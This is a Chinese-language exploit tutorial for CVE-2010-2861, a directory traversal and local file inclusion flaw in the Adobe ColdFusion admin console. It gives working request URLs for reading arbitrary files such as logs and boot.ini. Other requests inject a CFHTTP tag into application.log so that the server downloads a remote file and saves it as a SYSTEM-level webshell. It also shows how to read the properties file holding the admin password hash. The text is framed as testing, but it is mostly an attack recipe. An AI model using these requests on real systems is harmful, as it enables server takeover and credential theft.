160day剖析之COLDFUSION本地包含利用方法.docxVIP

0day分析之COLDFUSION本地包含利用方法 simeon 漏洞号CVE-2010-2861（/CVE-2010-2861.html）在Adobe ColdFusion 9.0.1及之前版本的管理控制台中存在多个目录遍历漏洞。远程攻击者可借助向CFIDE/administrator/中的CFIDE/administrator/settings/mappings.cfm，logging/settings.cfm，datasources/index.cfm，j2eepackaging/editarchive.cfm和enter.cfm发送的locale参数读取任意文件，本文对这些漏洞进行测试，可以获取管理员密码，以及通过本地包含直接获取webshell。 1、搭建goldfusion测试平台 我下载的是coldfusion-801-win-tre.rar，解压以后直接运行安装程序即可，设置很简单，进行相应设置即可。测试环境为 2.0day使用方法测试 （1）测试是否存在漏洞 在浏览器中输入地址29:8500/CFIDE/administrator/enter.cfm，其参数存在locale本地包含漏洞，其利用方法就是根据locale来构建。例如输入： 29:8500/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\logs\server.log%00en，如果存在漏洞会爆出server.log文件的详细信息，如图1所示。 图1测试是否存在漏洞 文件可以是application.log、server.log、eventgateway.log，要根据实际情况进行测试，文件还可以是磁盘上的任意文件，例如读取boot.ini文件内容： 29:8500/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\boot.ini%00en 图2读取磁盘其它文件内容 （2）利用url注入到application.log日志文件中 利用CFHTTP METHOD=Get URL=#URL.u# PATH=#URL.p# FILE=#URL.f#方法，构造一个地址，通过访问一个不存在的页面，将url内容写入到日志文件中，注意编码问题，否则不成功的。输入地址，如图3所示，会给出文件找不到错误信息： 29:8500/%3CCFHTTP%20METHOD%3DGet%20URL%3D%23URL.u%23%20PATH%3D%23URL.p%23%20FILE%3D%23URL.f%23%3E.cfml 图3提示文件未找到错误提示 这时候就会把CFHTTP METHOD=Get URL=#URL.u# PATH=#URL.p# FILE=#URL.f#注入到application.log里了，如图4所示。 图4将url内容写入application.log日志文件中 （3）获取shell 事先准备好一个shell.cfm，将该文件保存为txt文件，例如/tools/cfm.shell.txt，然后在浏览器中输入以下地址即可在根目录获取shell.cfm，如图5所示??获取的webshell为system权限。 29:8500//CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\logs\application.log%00enu=29:8500/1.txtp=C:\ColdFusion8\wwwrootf=shell.cfm 图5获取webshell （4）获取管理密码 perties文件一般位于C:\ColdFusion8\lib\文件夹下，只要读取该文件的信息，即可获取加密的密码，如图6所示。29:8500/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\perties%00en 图6获取goldfusion管理密码 3. LFI to Shell in Coldfusion 6-10利用方法分析 LFI获取Goldfusion6-10版本Shell方法（LFI to Shell in Coldfusion 6-10）原文见：http://hatriot.github.io/blog/2014/04/02/lfi-to-stager-payload-in-coldfusion/，其方法跟本文方法有些类似，只是其采用了base64